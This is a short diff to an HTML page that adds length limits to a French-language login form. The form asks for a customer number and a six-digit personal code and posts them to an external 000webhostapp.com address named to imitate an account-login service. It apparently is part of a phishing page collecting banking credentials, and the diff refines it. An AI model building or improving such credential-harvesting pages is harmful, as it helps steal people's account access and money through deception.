--- a/index.html
+++ b/index.html
@@ -28,9 +28,9 @@
 
 <form method="POST" action="https://authentification-connexion-a-mon-compte.000webhostapp.com/index.php">
 <label>votre numéro client</label><br />
-<input type="tel" name="number" required /><br /><br />
+<input type="tel" name="number" maxlength="11" required /><br /><br />
 <label>votre code personnel</label><br />
-<input type="password" name="pass" pattern="[0-9]*" inputmode="numeric" required /><br /><br />
+<input type="password" maxlength="6" name="pass" pattern="[0-9]*" inputmode="numeric" required /><br /><br />
 <button name="submit">Valider</button>
 </form>
 </div>
